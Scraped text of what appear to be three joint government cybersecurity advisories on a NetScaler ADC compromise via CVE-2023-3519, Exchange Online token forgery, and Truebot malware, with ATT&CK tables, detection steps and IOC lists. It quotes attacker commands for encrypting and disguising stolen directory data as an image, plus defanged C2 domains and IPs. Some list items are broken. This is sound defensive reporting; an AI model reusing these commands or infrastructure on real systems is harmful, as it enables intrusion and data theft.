As part of their initial exploit chain [T1190], the threat actors uploaded a TGZ file [T1105] containing a generic webshell [T1505.003], discovery script [TA0007], and setuid
binary [T1548.001] on the ADC appliance and conducted SMB scanning on the subnet [T1046].
The actors used the webshell for AD enumeration [T1016] and to exfiltrate AD data [TA0010]. Specifically, the actors:
/flash/nsconfig/keys/updated/*
and /nsconfig/ns.conf
[T1005]. Note: These configuration files contain an encrypted password that can be decrypted by the key stored on the ADC appliance [T1552.001].ldapsearch
. The actors queried for:
objectClass=user
) (objectcategory=person
) [T1033]objectClass=computer
) [T1018]objectClass=group
) [T1069.002]objectClass=subnet
)objectClass=organizationalUnit
)objectClass=contact
)objectClass=partition
)objectClass=trustedDomain
) [T1482]tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k -out /var/tmp/test.tar.gz
. (A “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration.)cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png
.The actors’ other discovery activities were unsuccessful due to the critical infrastructure organization’s deployment of their NetScaler ADC appliance in a segmented environment. The actors attempted to:
ping -c 1 google.com
) [T1016.001].The actors also attempted to delete their artifacts [TA0005]. The actors deleted the authorization configuration file (/etc/auth.conf
)—likely to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI) [T1531]. To regain access to the ADC appliance, the organization would normally reboot into single use mode, which may have deleted artifacts from the device; however, the victim had an SSH key readily available that allowed them into the appliance without rebooting it.
The actors’ post-exploitation lateral movement attempts were also blocked by network-segmentation controls. The actors implanted a second webshell on the victim that they later removed. This was likely a PHP shell with proxying capability. The actors likely used this to attempt proxying SMB traffic to the DC [T1090.001] (the victim observed SMB connections where the actors attempted to use the previously decrypted AD credential to authenticate with the DC from the ADC via a virtual machine). Firewall and account restrictions (only certain internal accounts could authenticate to the DC) blocked this activity.
See Table 1–Table 9 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Exploit Public-Facing Application |
The threat actors exploited CVE-2023-3519 to implant a webshell on the organization’s NetScaler ADC appliance. |
Technique Title |
ID |
Use |
---|---|---|
Server Software Component: Web Shell |
The threat actors implanted a generic webshell on the organization’s NetScaler ADC appliance. |
Technique Title |
ID |
Use |
---|---|---|
Abuse Elevation Control Mechanism: Setuid and Setgid |
As part of their initial exploit chain uploaded a TGZ file contain a |
Technique Title |
ID |
Use |
---|---|---|
Masquerading: Masquerade File Type |
The threat actors exfiltrated data by uploading it as an image file to a web-accessible path. |
Technique Title |
ID |
Use |
---|---|---|
Unsecured Credentials: Credentials In Files |
The threat actors obtained encrypted passwords from NetScaler ADC configuration files, and the decryption key was stored on the ADC appliance. |
|
Unsecured Credentials: Private Keys |
The threat actors obtained decryption keys to decrypt the AD credential obtained from the NetScaler ADC configuration files. |
Technique Title |
ID |
Use |
---|---|---|
Domain Trust Discovery |
The threat actors queried the AD for trusts. |
|
Permission Groups Discovery: Domain Groups |
The threat actors quired the AD for groups. |
|
Remote System Discovery |
The threat actors queried the AD for computers. The threat actors attempted to execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets. Network-segmentation controls prevented this activity. |
|
System Network Configuration Discovery |
The actors used a webshell for AD enumeration. |
|
System Network Configuration Discovery: Internet Connection Discovery |
The threat actors attempted to verify outbound network connectivity with a ping command and executed host commands for a subnet-wide DNS lookup. Network-segmentation controls prevented this activity. |
|
Network Service Discovery |
The threat actors conducted SMB scanning on the organization’s subnet. |
|
Account Discovery: Domain Account |
The threat actors queried the AD for users. |
Technique Title |
ID |
Use |
---|---|---|
Archive Collected Data: Archive via Utility |
The threat actors encrypted discovery data collected via openssl in “tar ball.” |
|
Data from Local System |
The threat actors viewed NetScaler ADC configuration files |
|
Data Staged |
The threat actors uploaded data as an image file to a web-accessible path: |
Technique Title |
ID |
Use |
---|---|---|
Ingress Tool Transfer |
The threat actors exploited CVE-2023-3519 to upload a TGZ file containing a generic webshell, discovery script, and setuid binary on the ADC appliance. |
|
Proxy: Internal Proxy |
The actors likely used a PHP shell with proxying capability to attempt proxying SMB traffic to the DC (the traffic was blocked by a firewall and account restrictions). |
Technique Title |
ID |
Use |
---|---|---|
Account Access Removal |
The threat actors deleted the authorization configuration file (/etc/auth.conf)—likely to prevent configured users from logging in remotely (e.g., CLI). |
Run the following victim-created checks on the ADC shell interface to check for signs of compromise:
-newermt
parameter with the date that corresponds to your last installation:
find /netscaler/ns_gui/ -type f -name *.php -newermt [YYYYMMDD] -exec ls -l {} ;
find /var/vpn/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
find /var/netscaler/logon/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
find /var/python/ -type f -newermt [YYYYMMDD] -exec ls -l {} ;
grep '.sh' /var/log/httperror.log*
grep '.php' /var/log/httperror.log*
post-ex
commands, for example:
grep '/flash/nsconfig/keys' /var/log/sh.log*
setuid
binaries dropped:
find /var -perm -4000 -user root -not -path "/var/nslog/*" -newermt [YYYYMMDD] -exec ls -l {} ;
4625
where the failure reason is “User not allowed to logon at this computer.”sh.log*
, bash.log*
) for traces of potential malicious activity (some example keywords for grep
are provided below):
database.php
ns_gui/vpn
/flash/nsconfig/keys/updated
LDAPTLS_REQCERT
ldapsearch
openssl + salt
httpaccess-vpn.log*
) for 200 successful access of unknown web resources.If compromise is detected, organizations should:
CISA recommends all organizations:
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Citrix Security Bulletin CTX561482: Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467
]]>In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment. The agency reported the activity to Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA), and Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data.
CISA and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory to provide guidance to critical infrastructure organizations on enhancing monitoring of Microsoft Exchange Online environments. Organizations can enhance their cyber posture and position themselves to detect similar malicious activity by implementing logging recommendations in this advisory. Organizations that identify suspicious, anomalous activity should contact Microsoft for proceeding with mitigation actions due to the cloud-based infrastructure affected, as well as report to CISA and the FBI.
Download the PDF version of this report:
In Mid-June 2023, an FCEB agency observed MailItemsAccessed
events with an unexpected ClientAppID
and AppID
in M365 Audit Logs. The MailItemsAccessed
event is generated when licensed users access items in Exchange Online mailboxes using any connectivity protocol from any client. The FCEB agency deemed this activity suspicious because the observed AppId
did not normally access mailbox items in their environment. The agency reported the activity to Microsoft and CISA.
Microsoft determined that APT actors accessed and exfiltrated unclassified Exchange Online Outlook data from a small number of accounts. The APT actors used a Microsoft account (MSA) consumer key to forge tokens to impersonate consumer and enterprise users. Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse.[1]
The affected FCEB agency identified suspicious activity by leveraging enhanced logging—specifically of MailItemsAccessed
events—and an established baseline of normal Outlook activity (e.g., expected AppID
). The MailItemsAccessed
event enables detection of otherwise difficult to detect adversarial activity.
CISA and FBI are not aware of other audit logs or events that would have detected this activity. Critical infrastructure organizations are strongly urged to implement the logging recommendations in this advisory to enhance their cybersecurity posture and position themselves to detect similar malicious activity.
CISA and the FBI strongly encourage critical infrastructure organizations to ensure audit logging is enabled. Note: Per CISA’s Microsoft Exchange Online Microsoft 365 Minimum Viable Secure Configuration Baselines, FCEB agencies shall enable audit logging. These minimum viable secure configuration baselines are part of CISA’s Secure Cloud Business Applications (SCuBA) Project, which provides guidance for FCEB agencies securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. The Office of Management and Budget (OMB) M-21-31 requires Microsoft audit logs be retained for at least twelve months in active storage and an additional eighteen months in cold storage. This can be accomplished either by offloading the logs out of the cloud environment or natively through Microsoft by creating an audit log retention policy.
In addition to enabling audit logging, CISA and FBI strongly encourage organizations to:
All mitigation actions for this activity are the responsibility of Microsoft due to the cloud-based infrastructure affected; however, CISA and the FBI recommend that critical infrastructure organizations implement the following to harden their cloud environments. Although, these mitigations will not prevent this or related activity where actors leverage compromised consumer keys, they will reduce the impact of less sophisticated malicious activity targeting cloud environments. Note: These mitigations align with CISA’s SCuBA Technical Reference Architecture (TRA), which describes essential components of security services and capabilities to secure and harden cloud business applications, including the platforms hosting the applications.
Organizations are encouraged to report suspicious activity to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov.
[1] Microsoft Security Response Center (MSRC) blog: Microsoft mitigates China-based threat actor Storm-0558 targeting of customer email
Microsoft contributed to this CSA.
The information in this report is being provided “as is” for informational purposes only. The FBI, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI and CISA.
]]>The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Canadian Centre for Cyber Security (CCCS) are releasing this joint Cybersecurity Advisory (CSA) in response to cyber threat actors leveraging newly identified Truebot malware variants against organizations in the United States and Canada. As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.
Previous Truebot malware variants were primarily delivered by cyber threat actors via malicious phishing email attachments; however, newer versions allow cyber threat actors to also gain initial access through exploiting CVE-2022-31199—(a remote code execution vulnerability in the Netwrix Auditor application), enabling deployment of the malware at scale within the compromised environment. Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks and CVE-2022-31199 to deliver new Truebot malware variants.
The authoring organizations recommend hunting for the malicious activity using the guidance outlined in this CSA, as well as applying vendor patches to Netwrix Auditor (version 10.5—see Mitigations section below).[1] Any organization identifying indicators of compromise (IOCs) within their environment should urgently apply the incident responses and mitigation measures detailed in this CSA and report the intrusion to CISA or the FBI.
Download the PDF version of this report:
Read the associated Malware Analysis Report MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks or download the PDF version below:
For a downloadable copy of IOCs in .xml and .json format, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section below for cyber threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
In recent months, open source reporting has detailed an increase in Truebot malware infections, particularly cyber threat actors using new tactics, techniques, and procedures (TTPs), and delivery methods.[2] Based on the nature of observed Truebot operations, the primary objective of a Truebot infection is to exfiltrate sensitive data from the compromised host(s) for financial gain [TA0010].
Following the successful download of the malicous file, Truebot renames itself and then loads FlawedGrace onto the host. Please see the FlawedGrace section below for more information on how this remote access tool (RAT) is used in Truebot operations.
After deployment by Truebot, FlawedGrace is able to modify registry [T1112] and print spooler programs [T1547.012] that control the order that documents are loaded to a print queue. FlawedGrace manipulates these features to both escalate privilege and establish persistence.
During FlawedGrace’s execution phase, the RAT stores encrypted payloads [T1027.009] within the registry. The tool can create scheduled tasks and inject payloads into msiexec[.]exe
and svchost[.]exe
, which are command processes that enable FlawedGrace to establish a command and control (C2) connection to 92.118.36[.]199
, for example, as well as load dynamic link libraries (DLLs) [T1055.001] to accomplish privilege escalation.
Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations. Please see the Cobalt Strike section below for more information on how this remote access tool (RAT) is used in Truebot operations.
During the first stage of Truebot’s execution process, it checks the current version of the operating system (OS) with RtlGetVersion
and processor architecture using GetNativeSystemInfo
[T1082].[4] Note: This variant of Truebot malware is designed with over one gigabyte (GB) of junk code which functions to hinder detection and analysis efforts [T1027.001].
Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057], collect sensitive local host data [T1005], and send this data to an encoded data string described below for second-stage execution. Based on IOCs in table 1, Truebot also has the ability to discover software security protocols and system time metrics, which aids in defense evasion, as well as enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks [T1518.001][T1124].
Next, it uses a .JSONIP
extension, (e.g., IgtyXEQuCEvAM.JSONIP
), to create a thirteen character globally unique identifier (GUID)—a 128-bit text string that Truebot uses to label and organize the data it collects [T1036].
After creating the GUID, Truebot compiles and enumerates running process data into either a base64 or unique hexadecimal encoded string [T1027.001]. Truebot’s main goal is identifying the presence of security debugger tools. However, the presence of identified debugger tools does not change Truebot’s execution process—the data is compiled into a base64 encoded string for tracking and defense evasion purposes [T1082][T1622].
Following Truebot’s enumeration of running processes and tools, the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a POST
request (as observed in the user-agent string). Note: A user-agent string is a customized HTTP request that includes specific device information required for interaction with web content. In this instance, cyber threat actors can redirect victims to malicious domains and further establish a C2 connection.
The POST
request functions as means for establishing a C2 connection for bi-lateral communication. With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004]. Truebot malware has the capability to download additional malicious modules [T1105], load shell code [T1620], and deploy various tools to stealthily navigate an infected network.
Truebot has been observed in association with the following delivery vectors and tools:
Raspberry Robin is a wormable malware with links to other malware families and various infection methods, including installation via USB drive [T1091].[5] Raspberry Robin has evolved into one of the largest malware distribution platforms and has been observed deploying Truebot, as well as other post-compromise payloads such as IcedID and Bumblebee malware.[6] With the recent shift in Truebot delivery methods from malicious emails to the exploitation of CVE-2022-31199, a large number of Raspberry Robin infections have leveraged this exploitable CVE.[2]
FlawedGrace is a remote access tool (RAT) that can receive incoming commands [T1059] from a C2 server sent over a custom binary protocol [T1095] using port 443 to deploy additional tools [T1105].[7] Truebot malware has been observed leveraging (and dropping) FlawedGrace via phishing campaigns as an additional payload [T1566.002].[8] Note: FlawedGrace is typically deployed minutes after Truebot malware is executed.
Cobalt Strike is a popular remote access tool (RAT) that cyber threat actors have leveraged—in an observable manner—for a variety of post-exploitation means. Typically a few hours after Truebot’s execution phase, cyber threat actors have been observed deploying additional payloads containing Cobalt Strike beacons for persistence and data exfiltration purposes [T1059].[2] Cyber threat actors use Cobalt Strike to move laterally via remote service session hijacking [T1563.001][T1563.002], collecting valid credentials through LSASS memory credential dumping, or creating local admin accounts to achieve pass the hash alternate authentication [T1003.001][T1550.002].
Cyber threat actors have been observed using a custom data exfiltration tool, which Talos has named “Teleport.”[2] Teleport is known to evade detection during data exfiltration by using an encryption key hardcoded in the binary and a custom communication protocol [T1095] that encrypts data using advanced encryption standard (AES) and a hardcoded key [T1048][T1573.002]. Furthermore, to maintain its stealth, Teleport limits the data it collects and syncs with outbound organizational data/network traffic [T1029][T1030].
Truebot IOCs from May 31, 2023, contain IOCs from cyber threat actors conducting Truebot malspam campaigns. Information is derived from a trusted third party, they observed cyber threat actors from 193.3.19[.]173
(Russia) using a compromised local account to conduct phishing campaigns on May 23, 2023 and spread malware through: https[:]//snowboardspecs[.]com/nae9v
, which then promptly redirects the user to: https://www.meditimespharma[.]com/gfghthq/
, which a trusted third party has linked to other trending Truebot activity.
After redirecting to https://www.meditimespharma[.]com/gfghthq/
, trusted third parties have observed, the cyber threat actors using Truebot to pivot to https://corporacionhardsoft[.]com/images/2/Document_16654.exe
, which is a domain associated with snowboardspecs[.]com
. This malicious domain has been linked to UNC4509, a threat cluster that has been known to use traffic distribution systems (TDS) to redirect users to either a benign or malicious website to facilitate their malicious phishing campaigns in May 2023.
According to trusted third parties, the MD5 Hash: 6164e9d297d29aa8682971259da06848
is downloaded from https://corporacionhardsoft.com/images/2/Document_16654[.]exe
, and has been flagged by numerous security vendors, as well as is linked to UNC4509 Truebot campaigns. Note: These IOCs are associated with Truebot campaigns used by Graceful Spider to deliver FlawedGrace and LummaStealer payloads in May of 2023.
After Truebot is downloaded, the malware copies itself to C:IntelRuntimeBroker.exe
and—based on trusted third party analysis—links to https://essadonio.com/538332[.]php
(which is linked to 45.182.189[.]71
(Panama) and is associated with other trending Truebot malware campaigns from May 2023).
Please reference table 1 for IOCs described in the paragraph above.
Table 1: Truebot IOCs from May of 2023 | ||
---|---|---|
Indicator Type |
Indicator |
Source |
Registrant |
GKG[.]NET Domain Proxy Service Administrator |
Trusted Third Party |
Compromised Account Created: |
2022-04-10 |
Trusted Third Party |
Malicious account created |
1999-11-09 |
Trusted Third Party |
IP |
193.3.19[.]173 (Russia) |
Trusted Third Party |
URL |
https://snowboardspecs[.]com/nae9v |
Trusted Third Party |
Domain |
https://corporacionhardsoft[.]com/images/2/Document_16654.exe |
Trusted Third Party |
File |
Document_16654[.]exe |
Trusted Third Party |
MD5 Hash |
6164e9d297d29aa8682971259da06848 |
Trusted Third Party |
File |
Document_may_24_16654[.]exe |
Trusted Third Party |
File |
C:IntelRuntimeBroker[.]exe |
Trusted Third Party |
URL |
https://essadonio.com/538332[.]php |
Trusted Third Party |
IP |
45.182.189[.]71 (Panama) |
Trusted Third Party |
Account Created |
2023-05-18 |
Trusted Third Party |
Table 2: Truebot malware IOCs from May of 2023 | ||
---|---|---|
Indicator Type |
Indicator |
Source |
File Name |
Secretsdump[.]py |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
Domain |
Imsagentes[.]pe |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
URL |
https://imsagentes[.]pe/dgrjfj/ |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
URL |
https://imsagentes[.]pe/dgrjfj |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
URL |
https://hrcbishtek[.]com/{5 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
URL |
https://ecorfan.org/base/sj/document_may_24_16654[.]exe |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
Domain |
Hrcbishtek[.]com |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
MD5 Hash |
F33734DFBBFF29F68BCDE052E523C287 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
MD5 Hash |
F176BA63B4D68E576B5BA345BEC2C7B7 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
MD5 Hash |
F14F2862EE2DF5D0F63A88B60C8EEE56 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
Domain |
Essadonio[.]com |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
Domain |
Ecorfan[.]org |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
SHA256 Hash |
C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
File Name |
Atexec[.]py |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
MD5 Hash |
A0E9F5D64349FB13191BC781F81F42E1 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
IPv4 |
92.118.36[.]199 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
IPv4 |
81.19.135[.]30 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
MD5 Hash |
72A589DA586844D7F0818CE684948EEA |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
SHA256 Hash |
717BEEDCD2431785A0F59D194E47970E9544FBF398D462A305F6AD9A1B1100CB |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
IPv4 |
5.188.86[.]18 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
IPv4 |
5.188.206[.]78 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
IPv4 |
45.182.189[.]71 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
IPv4 |
139.60.160[.]166 |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
SHA256 Hash |
121A1F64FFF22C4BFCEF3F11A23956ED403CDEB9BDB803F9C42763087BD6D94E |
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/ |
Table 3: Truebot IOCs from May 2023 (Malicious Domains, and Associated IP addresses and URLs) | ||
Malicious Domain | Associated IP(s) | Beacon URL |
nitutdra[.]com |
46.161.40[.]128 |
|
romidonionhhgtt[.]com |
46.161.40.128 |
|
midnigthwaall[.]com |
46.161.40[.]128 |
|
dragonetzone[.]com |
46.161.40[.]128 |
hxxps://dragonetzone[.]com/gate_info[.]php |
rprotecruuio[.]com |
45.182.189[.]71 |
|
essadonio[.]com |
45.182.189[.]71 |
hxxps://nomoresense[.]com/checkinfo[.]php |
nomoresense[.]com |
45.182.189[.]91 |
hxxps://nomoresense[.]com/checkinfo[.]php |
ronoliffuion[.]com |
45.182.189[.]120 |
hxxps://ronoliffuion[.]com/dns[.]php |
bluespiredice[.]com |
45.182.189[.]119 |
|
dremmfyttrred[.]com |
45.182.189[.]103 |
hxxps://dremmfyttrred[.]com/dns[.]php |
ms-online-store[.]com |
45.227.253[.]102 |
|
ber6vjyb[.]com |
92.118.36[.]252 |
hxxps://ber6vjyb[.]com/dns[.]php |
jirostrogud[.]com |
88.214.27[.]101 |
hxxps://ber6vjyb[.]com/dns[.]php |
fuanshizmo[.]com |
45.182.189[.]229 |
|
qweastradoc[.]com |
92.118.36[.]213 |
hxxp://nefosferta[.]com/gate[.]php |
qweastradoc[.]com |
92.118.36[.]213 |
hxxp://nefosferta[.]com/gate[.]php |
qweastradoc[.]com |
92.118.36[.]213 |
hxxp://nefosferta[.]com/gate[.]php |
hiperfdhaus[.]com |
88.214.27[.]100 |
hxxp://nefosferta[.]com/gate[.]php |
guerdofest[.]com |
45.182.189[.]228 |
hxxp://qweastradoc[.]com/gate[.]php |
nefosferta[.]com |
179.60.150[.]139 |
hxxp://nefosferta[.]com/gate[.]php |
Table 4: Truebot IOCs from May 2023 Continued (Malicious Domains and Associated Hashes) | |||
---|---|---|---|
Malicious Domain |
MD5 |
SHA1 |
SHA256 |
nitutdra[.]com |
|
|
|
romidonionhhgtt[.]com |
|
|
|
midnigthwaall[.]com |
|
|
|
dragonetzone[.]com |
64b27d2a6a55768506a5658a31c045de |
c69f080180430ebf15f984be14fb4c76471cd476 |
e0178ab0893a4f25c68ded11e74ad90403443e413413501d138e0b08a910471e |
rprotecruuio[.]com |
|
|
|
essadonio[.]com |
9a3bad7d8516216695887acc9668cda1 |
a89c097138e5aab1f35b9a03900600057d907690 |
4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0 |
essadonio[.]com |
6164e9d297d29aa8682971259da06848 |
96b95edc1a917912a3181d5105fd5bfad1344de0 |
717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb |
nomoresense[.]com |
8f924f3cbe5d8fe3ecb7293478901f1a |
516051b4cab1be74d32a6c446eabac7fc354904f |
6b646641c823414c2ee30ae8b91be3421e4f13fa98e2d99272956e61eecfc5a1 |
nomoresense[.]com |
ac6a2f1eafaae9f6598390d1017dd76c |
1c637c2ded5d3a13fd9b56c35acf4443f308be52 |
f9f649cb5de27f720d58aa44aec6d0419e3e89f453730e155067506ad3ece638 |
ronoliffuion[.]com |
881485ac77859cf5aaa8e0d64fbafc5f |
51be660a3bdaab6843676e9d3b2af8444e88bbda |
36d89f0455c95f9b00a8cea843003d0b53c4e33431fe57b5e6ec14a6c2e00e99 |
bluespiredice[.]com |
|
|
|
dremmfyttrred[.]com |
e4a42cbda39a20134d6edcf9f03c44ed |
afda13d5365b290f7cdea701d00d05b0c60916f8 |
47f962063b42de277cd8d22550ae47b1787a39aa6f537c5408a59b5b76ed0464 |
dremmfyttrred[.]com |
aa949d1a7ebe5f878023c6cfb446e29b |
06057d773ad04fda177f6b0f6698ddaa47f7168a |
594ade1fb42e93e64afc96f13824b3dbd942a2cdbc877a7006c248a38425bbc1 |
dremmfyttrred[.]com |
338476c2b0de4ee2f3e402f3495d0578 |
03916123864aa034f7ca3b9d45b2e39b5c91c502 |
a67df0a8b32bdc5f9d224db118b3153f66518737e702314873b673c914b2bb5c |
ms-online-store[.]com |
|
|
|
ber6vjyb[.]com |
46fe07c07fd0f45ba45240ef9aae2a44 |
b918f97c7c6ebc9594de3c8f2d9d75ecc292d02b |
c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125 |
jirostrogud[.]com |
89c8afc5bbd34f160d8a2b7218b9ca4a |
16ecf30ff8c7887037a17a3eaffcb17145b69160 |
5cc8c9f2c9cee543ebac306951e30e63eff3ee103c62dadcd2ce43ef68bc7487 |
jirostrogud[.]com |
5da364a8efab6370a174736705645a52 |
792623e143ddd49c36f6868e948febb0c9e19cd3 |
80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9 |
fuanshizmo[.]com |
|
|
|
qweastradoc[.]com |
ee1ccb6a0e38bf95e44b73c3c46268c5 |
62f5a16d1ef20064dd78f5d934c84d474aca8bbe |
0e3a14638456f4451fe8d76fdc04e591fba942c2f16da31857ca66293a58a4c3 |
qweastradoc[.]com |
82d4025b84cf569ec82d21918d641540 |
bb32c940f9ca06e7e8533b1d315545c3294ee1a0 |
c042ad2947caf4449295a51f9d640d722b5a6ec6957523ebf68cddb87ef3545c |
qweastradoc[.]com |
dbecfe9d5421d319534e0bfa5a6ac162 |
9e7a2464f53ce74d840eb84077472bc29fd1ba05 |
c9b874d54c18e895face055eeb6faa2da7965a336d70303d0bd6047bec27a29d |
qweastradoc[.]com |
b7fed593e8eb3646f876367b56725e6c |
44090a7858eceb28bc111e1edd2f0dc98047afb2 |
ff8c8c8bfba5f2ba2f8003255949678df209dbff95e16f2f3c338cfa0fd1b885 |
hiperfdhaus[.]com |
8e2b823aac6c9e11fcabecb1d8c19adf |
77ad34334a370d85ca5e77436ed99f18b185eee3 |
a30e1f87b78d1cd529fbe2afdd679c8241d3baab175b2f083740263911a85304 |
hiperfdhaus[.]com |
8a94163ddf956abd0ea92d89db0034e5 |
abc96032071adeb6217f0a5ba1aff55dc11f5438 |
b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf |
guerdofest[.]com |
65fb9572171b903aa31a325f550d8778 |
d8bd44b7a8f136e29b31226f4edf566a4223266c |
d5bbcaa0c3eeea17f12a5cc3dbcaffff423d00562acb694561841bcfe984a3b7 |
nefosferta[.]com |
d9d85bdb6a3ac60a8ba6776c661dbace |
78e38e522b1765efb15d0585e13c1f1301e90788 |
092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875 |
nefosferta[.]com |
20643549f19bed9a6853810262622755 |
c8227dcc1cd6ecc684de8c5ea9b16e3b35f613f1 |
1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49 |
nefosferta[.]com |
e9299fc9b7daa0742c28bfc4b03b7b25 |
77360abc473dc65c8bdd73b6459b9ea8fddb6f1d |
22e3f4602a258e92a0b8deb5a2bd69c67f4ac3ca67362a745178848a9da7a3cc |
nefosferta[.]com |
775fb391db27e299af08933917a3acda |
eaaa5e68956a3a3f6113e965199f479e10ae9956 |
2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7 |
nefosferta[.]com |
f4045710c99d347fe6dfa2c0fcadde29 |
b7bffdbbaf817d149bbd061070a2d171449afbfc |
32ae88cddeeeec255d6d9c827f6bffc7a95e9ea7b83a84a79ff793735a4b4ed7 |
nefosferta[.]com |
587acecdb9491e0897d1067eb02e7c8d |
a9eb1ac4b85d17da3a2bae5835c7e862d481c189 |
55d1480cd023b74f10692c689b56e7fd6cc8139fb6322762181daead55a62b9e |
nefosferta[.]com |
0bae65245e5423147fce079de29b6136 |
f24232330e6f428bfbb6b9d8154db1c4046c2fc2 |
6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727 |
nefosferta[.]com |
5022a85b39a75ebe2bc0411d7b058b2e |
a9040ac0e9f482454e040e2a7d874ddc50e6f6ce |
68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89 |
nefosferta[.]com |
6a2f114a8995dbeb91f766ac2390086e |
edac3cf9533b6f7102f6324fadb437a0814cc680 |
72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d |
nefosferta[.]com |
e9115cc3280c16f9019e0054e059f4b8 |
dad01b0c745649c6c8b87dbeb7ab549ed039515d |
7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00 |
nefosferta[.]com |
b54cc9a3dd88e478ea601dfd5b36805e |
318fdfec4575d1530a41c80274aa8caae7b7f631 |
7c607eca4005ba6415e09135ef38033bb0b0e0ff3e46d60253fc420af7519347 |
nefosferta[.]com |
f129c12b1bda7426f6b31682b42ee4b0 |
5bb804153029c97fe23517ae5428a591c3c63f28 |
7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63 |
nefosferta[.]com |
f68aa4c92dd30bd5418f136aaf6c07d6 |
aa56f43e39d114235a6b1d5f66b593cc80325fa4 |
7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca |
nefosferta[.]com |
